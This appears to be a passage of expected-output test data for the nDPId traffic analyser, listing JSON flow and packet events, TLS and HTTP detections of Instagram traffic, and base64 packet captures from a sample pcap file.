01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1436720908719,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908719,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRgAAEABOq7AqABnwKgAZwMDAwcAAAAARQAAPLKEQABABvFRwKgAZ63CKBTA\/QG7ZKZcEQAAAACgAjkIlxQAAAIEBbQEAggKAAPulQAAAAABAwMG"}
02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1436720908720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908720,"pkt":"QPMIw47hABsv8H60CABFAAWqkOBAAFUGUh0fDV00wKgAZwG7g+MQ445PobbjVYAQANmoZAAAAQEICvAgso0AA+57FwMBBgAJWuxAFmWJOuMXXLFPa+ihsePS3XMy0YIQztBBVmLMKv7bKksLnHy6Qejj3IofgvBbzBtV3GqDkMg6uh0P6N7FwcSe3tUjgcGiijvn6K818Zp8xqjp0tEb5pWvqXYqObddd2Hnzu6vQfWb9eTm5eWBjMWaH+46WOkF+yLDu28OnCnI6DRA4hVUhPFmv3Y3Jc5EGy9h1liFAXpPz8RauF02nsY9w0LD3TtF0JwByoPONdeUPZq\/WKka9SPqVUAIaUqD+iiuPiB4iY\/P40454jR2ubUAx1KxalPDxCZcJOVc\/mRFMjjylf886\/qgnF5\/zNdIB+osc8LQ7+njijbpW6+nsd1r20QxY5h4iboPc5bOwlwaY54bOkKhUi3rW\/yK+SdRmOIbvY6QnNs\/NHnLztmSVepcsVQj4\/LAs3sQee2yV5Zb\/OKdnbNcoVz0fzHzanGF+shxmnBL7MHCUWI6dyfgrtdeHJw7AeiUY3i\/mTZNsE8HDXYtj4PZmBRSpw9Tn6yrOi8oCWZlu5KzIRGzRJtFphUHZ6meh5JLg+hn5njKZANgsGVL5D4VIgoF1kaCOaYkGXgkZUN4f977LcfvI6GMq+I5puCewiP+Uuk1kPF9pzskRav04M10TqsDM7GhlmoPVQK4OBUJ9tHagFf6IatPi0\/17iyM\/LjiFML0PoAxBFfvl5DWDm64B7S6wNuZznilyLl+dRCTX+DG4IWEZ9iWMuJz0q4h3NgjCjbVoEhcXrIzm79zTgYF1K\/Fc1eVQ5pDkZIk+MSfw+JmzqDNkO7KlRRDcuvw+93T8NghPFPmCMaGi36H+eJ8qZHgJQD6VyTq0u+kS7b7xcTR0rfQCJsFB5GAwMG7Gp3gleQk40HnR7gOPSTpCQbfSRM+5donNBgSWHGZa9A+e6lLq4NFCERiwzj3U\/o3rAI1FPY3nDbj4wb3EgILuovLCxScYhTNarC2IzSTHU8Qk8N2SV+q0qGc9KDK7Jyj+IHlvAecHsLgYXphxLiTsup\/3eR29a5fD0B54hNbSHf+QHisCGvO8syBPnMdbwGhHIhnTTwNn1eEHqk6X5WP24wp\/q9HBPEopbXKhKpIJHSzjJGb6QwaZFDvJ0eS8PBbauWDkSrvIOpQ+81F3KtLkj4QiFmXv6kUM6e\/ijm1X4ctGQCDMzfE6CL9kNIZ0KT10hk0pBqwVPBgsjzabFgBWuwkhXkJMqXx8tC1EU+7y29gsrs\/ybrD8eTd4mRW4AQWWxsx8SCg4RuBagiQndKzKvD7t\/D1UNx\/cjM+FPNHc3Vo6COyR4bKIxJFsFcqKxflWpQPrWlcHnstMeCf6fe7rHShYcn66kSCS9GJMM\/PUNJmbrAgWC5m7qX18BfYRtqglq81Hxihw61ZCMOoAsDBgvxxxkjs4uHIg0bxq+QIHC4jEm62Kc2GqcJIEifAbDIMGTrfg+zGbXs6fbA2wHWV\/6sG736+zvLX7Jbtdr+R3sSX9sMXEufLQEprDfFP7rjDtjD6q3s32bdz6TPKsaKweTpBUQdUPpxrBp58LHYIfh7kBM6ZZ7B\/leOdLQ4iB0qa4hkq1hvJbOmBVgxwN8J6lLAiR2zfKtjyjIgh1PIEwm0tWG3PrpvEGPUu+zdVEzsubp+CEZmpQpom3JAd8mN1yHxpyrcTLFJkY\/8guFvDtth\/joA1HCjPx5dnKVrWK+v+DF0itobPJ17srGXjTUdxq+PcFTOSkogqyTZpAghuLdzESZm4BYIuVxTMgSSAIWua\/B9nB7ubZGXJW35Hmjvh2589ysVkb287bswERaCrOs6tPVp2NtqRIS7vXD6J\/TWsp5LCRdFcfNfT70AwbYVcnpBdE0+y3eeVEDxU"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942507,"flow_last_seen":1436720942507,"flow_idle_time":7440000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720942507,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1436720942507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942507,"pkt":"QPMIw47hABsv8H60CABFAAW+7YVAADkGAKFcejCKwKgAZwBQolpM7hj\/zhvj2IAQAkuefgAAAQEIClRk1HoAA\/vEM\/iaPUALhIFKAs5lHhGDDQh9Ri+cJ7IlO3+U+lz\/AJfyy4DxuV\/4P\/o+vmeH\/hNqoIELoODxfoOAIXO0PMXMPnHoxqeYBwGo8oxahQh6j0xfzNnmEda9CmYCeDSna\/qNrEPvGW50RvR5h7uG+kXcGOBC7BGEPlQE7Yj9VADdS1kT29D7gnk\/qeBFzA3CDCDhz3gqv7gHmWA5mGyOJepR4EJPDEPmPiCsftA0fdwDBLwVjxH\/APKX29LRhXxOnSI4Ih5PTBEwQnYqjD3MPs\/lmZehG\/8AA\/8AT9Hx6L7CfPoFCO57QQY24Pf04EGPxc98QOB6OuYRGOvzGux+sHlCW3CnI9H6gK1Ng5mdNzFbgAyRCbreGctT5jQZEPRP6hHkIS+\/zCBFmIuGjFqI5\/uEmVBMg4hgvEdvaB+4PuYjwpncLG\/tARaSCgOECnAbe4e1GCNFARmxVQDALDyR+IOzv5nsz8T3R9wgRZi+8GdC55PovxL0YHoYoPEbSjg1BB16Ln\/4Ec+hG4XhdQP\/AAj\/AMS6qDzBT7P5oVuK4jP\/AJHo+vQ7xerHEOB\/MJM94fCL+ohnTjGoAOagD3iFagB4f5QswHhzoMy9DME64+YwcJGH3EIGYuyBB\/nEZ7TiCoY8wSKYOu5S3H2g4tgD7wANpxRQzjSFNilH9hDgQM9sJvDWSNGHs+0x8CbLnF1CclwLoBlRBpI3BxPAqGmw4ykVAG2kgAoGHly28ROIeyXA2GoWBRqYf9ufUEBje0FkRrD+IQecxboE3AOv7hC5gHugOOCfdiAGoheJXCdB6Ed+p6M6LnkF\/wDE\/UhuA8wf1fzRQdReggNdvURGX6gnc9o44SIJ4hEESg55h9ABOXCdAKBoAFARRJEzn9QkfZAdHcCZJ+0IfM82YFNwK2Mw9qjfbgB0alLX9QhRGT8SvaFD494T\/MQk8fqbOERdBBwkdmvmWKJzcwHIfLgJbfaBYGFByYLxbUA8zSMwDgeEJIj+oTwQfxK2SqgEvgPeFbIcbVX7KFvlB0KE87hYZQPRwPeH6uPhbjHBiWw7nL\/pnZCDnKByYHCBX5hgfMf3hZBZhDmz8QG7Sft6CPUI8RE4GpvB6ATxO3ovP\/jgJ7wEhHscGHx\/KuIHYBmYYPQqqng7Ew+z+eE4MfX\/AIH\/AIC6cAjiPoYHoIzU95cXVxsDhHD1AhE8T+IY4OoOZmio9RCbH6gBuoGYHNqg6GxAMRoQsrcD5h\/xiG2xCYJgDAIuFMDMWQBiwOT8QxkaQi4CCaSgP+GHg7nfnqF6wY1vXxCXqouAITzC5A3GyRRmF3HmjA9oXEGuJ4Jq1PKGF\/7E95xsZ1BT9jB0SPvOduIB7RHP\/I2Kh0kBNLD6MJz\/AJxbQj\/cwB4GCtzsgKZoQlqFxuEQHvc\/HoBi7iniEcIXcEEJgK9QOtGCOFaheFFdZ+3oP5CQaM\/4fzxGF7M4WoAHGX69x7j9FCP\/AB2jTxue8EBOF7EXZxDcScHjmEuIzgiYdDA4gRRtmHoJ56mwKX8F7wmCMfSKDe0XnQmaYuEnIC1Mc2QAHUVdCAtCh95n5imGNgyjyD5nfMLuXxBSoSDA8yxX\/E2oKG5iGgBLzCfMJ8wOCHsTPCecIsrQDCihrgix+Z7lA8uF2\/cOhJ+kLZAhOzHsR5iHYfYwUTAf3AWIwicr0HmfKhO7a+IxmwhfEE4GEoYUcHmODzCekU8+jhiigMf\/AMP\/AC\/+CLkzo9Jgh9HB5hJiiiPP\/m\/QDF7gHoYUsRjU4ATF9pWVBkA54Qk7j4h1hQB0nyIzIr0gCl4cXcIPGA8E49oZ0qhZBz7QqP8AqAKhDWgfxPgD+8p7uAtmJgK+HmA8sQ2B+ggN5gCPfcBNIz9YSgzZ9hABBp2CMzM="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1436720942508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720942508,"pkt":"ABsv8H60QPMIw47hCABFAAA0JelAAEAGxsfAqABnXHowiqJaAFDOG+PYTO4eiYAQH+pOOgAAAQEICgAD+8dUZNR5"}
02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1436720942509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942509,"pkt":"QPMIw47hABsv8H60CABFAAW+7YZAADkGAKBcejCKwKgAZwBQolpM7h6Jzhvj2IAQAkvuxQAAAQEIClRk1HoAA\/vEO6\/U4C+0OWUTJgAb794HkAIhArOYgdkfiI22BCGjBFAjMJ7H5gWBudggbAYMBAg88QCbuhm0hAg9wQYHeJyZzGwFB7zDuEb1CIxUMRuZfliB7np0MYgeoY4J7+qgeYPabQ\/aB4IL9PHo+vR91\/N\/x\/EBC\/8A0ezA+Z8w+PUejh1dzuvQYmm4BAIYI\/EcE+jUD4nkjsnAhNA8wx5OA5aeINz\/AAUBr\/OAOALiPDMHk39If+VARek0ggL5idUhkPX2hAQrDqABo5\/wj6blcUMHps+4h4H9wU9ldOEBaMbWJMBg7F6bLf4ECwWUHgrMEFkEjMCoIwBEzYQLC4LK3AoAyviVQjybhI9r6wlsCgB94VnhTqRmcsioR5j39iByFiDkW+p4l8DUIG3Dyi4mQAZhCyClDE8GHwYPw7gzQ7QkYBnMHUC44nvArqGLzB9YQbQj7EXX6jh\/8eYjwIFiiz8Q2EAOV\/J\/x\/NHF6LrmV6Dxcv0cqD0MXc+CC9nEbBVQOPX2ggjHHvMvqNwABPCOeMwlwkwvyoIxB0cfSIC0DB7xZrUJVmM5BC0yIAV7Yl2YC3A5ZgUA\/KF+xEAWdXLIAuYgd+YS27EPvuMQOQnQJw3GzgZ9R+JmMzlA+JlcA0TD1iDIUoajMm\/tESS4X3XHjoOZyDMKfeEmMwvwcoyHZ\/uUUCTC2rUXHInKoObP2gYKzOtS8IzHhA8F3HuZYIEo5ZHzE3qLhzoY+YAWCiPcGZwkp7ejUc+gga3G1eIfdfedlAT5gj5EE6gdzz6iFTkFQjlEicGXPeeH8X\/AB\/ED\/5XpeIz7wA8TpK\/gPv6VSjOjn1MAi\/3MI+8EfcCE7HBEANXcACPv6wUqjgLgz8RDKgfEwYWFaUo4Fqf7VxCfaXmKxR3zcPJAAMAF9qAAtEUIRw00NEmM0hCDHA7h7DEMhnudgYhPg9oeAYfNLwrg51CVPEQAWcPg7EXLL9MBJSwx9YZNq1KYagWYA+h4H0K2CvpPdEDv8GNXZrxEphqeRmaBf0jG3TP4gIo7h8Qnc7HMEPIQ9MYgoBDKJnhXF36CJa2ICTAm1lHzqHqEuYAMKeeIR3BwBhHkwuRAYAYoDD\/AOBC+IR1Pf8A9f8AA\/h\/p\/8AL9DK4jiQmCE+p9faB5idQkYTPD0B59HC\/aAQO7qV3CYV1ZgDiovRHuVyAfrBFwZNPjFwKif1AWf2J2OENoUB+iZ4gniUx+IHTH6wBkeYwWEmDrCuR+YjiR4wICxwiF5JxELRFQLQCHzHzuBEEnDGTAEqWD+ShAN5cKZpAYRsmSxHSjO2xQ6w+HMTYnzC1FonyIOIR3AYBABDff8AyDZtfEVIYiKJhQDgP8z5DwYCUEHYxPeKKGKB4hDSL3QYgR+UAOxj6StiMylB2zD5KM65g7cfcXxmA8LHvAuoZ5hg8w+6uLzB6JH6GVH6dnXp4ev\/AAP5gIT\/AOFzqcLgd\/8AjtF6GeB6BT3gEe4YP39BC4Sk49RQhRqeIehOPMAz8Inhwtq4LXEJ1aUu\/TzAstcfbxB5v9TsR6HUP3QMI4jOnKgzrELSNTN1A5H7Qk3lxdJcFQrcADz6E8y+DmEIbgGJhOH3BbcIGziEwHPJ+I+E4CPabiALnOh9A4O4qjsRRPELQDgwRZyEPYQruIeB+5TMEqcJo\/MI7Idz6oBxMrQnuUnkCBt\/UBe8Q9RQ1j1p3cA0hfMfiH3CITwf\/NQnmD0KswQ\/+f8Ah\/D9IUFjf\/oTHEIClQz2qBAYII+oVHHD6KGByZqnhBDD49B1AYAdwdz3iimo9Dc4Row\/KI5J\/uOEEGO5YEPBioY1COYTPdCMjxANjAId+EI6EA2AahcCHIIVEDqIt8j7wQrjygpv6whzUCbmYRCBYNQWyVqMbJQ="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720942530,"pkt":"ABsv8H60QPMIw47hCABFAAE4n8hAAEAGa\/HAqABnUlUaouLEAFAvtWVoUhBMjIAYFINNAAAAAQEICgAD+8pWC84nR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExNDE3MzQ5XzE2MTA0MjQ0NTI1NTk2MzhfMTU1OTA5NjE1Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtZy5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="}
00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1436720942580,"pkt":"ABsv8H60QPMIw47hCABFAAEzOUlAAEAG0nXAqABnUlUaouLFAFD1YMTERbSUBYAYD2PW+wAAAQEICgAD+89WC83JR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMzc5Mjg0XzE2NTE0MTY3OTg0MDgyMTRfMTUyNTY0MTQ2Nl9uLmpwZyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWcuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"}
00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1436720942592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAFAADkG3jJSVRqiwKgAZwBQ4sRSEEyML7VmbIAQAggFiAAAAQEIClYL0tgAA\/vKSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBUaHUsIDA5IEp1bCAyMDE1IDIxOjI4OjQ3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTE3NzgwDQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA5OjAyIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDA4NzQ5MDAwMDFlNjAwMDAwZmE3MzAwMDA2M2U0MDAwMGEyMzYwMTAwZTk2MDAxMDAxMmNjMDEwMDdkMTQwMjAwZGE1ZjAyMDAA\/9sAQwAHBwcHBwcMBwcMEQwMDBEXERERERceFxcXFxceJB4eHh4eHiQkJCQkJCQkKysrKysrMjIyMjI4ODg4ODg4ODg4\/9sAQwEJCQkODQ4ZDQ0ZOyghKDs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7\/8IAEQgEOAQ4AwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAQAAQIDBQYHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAA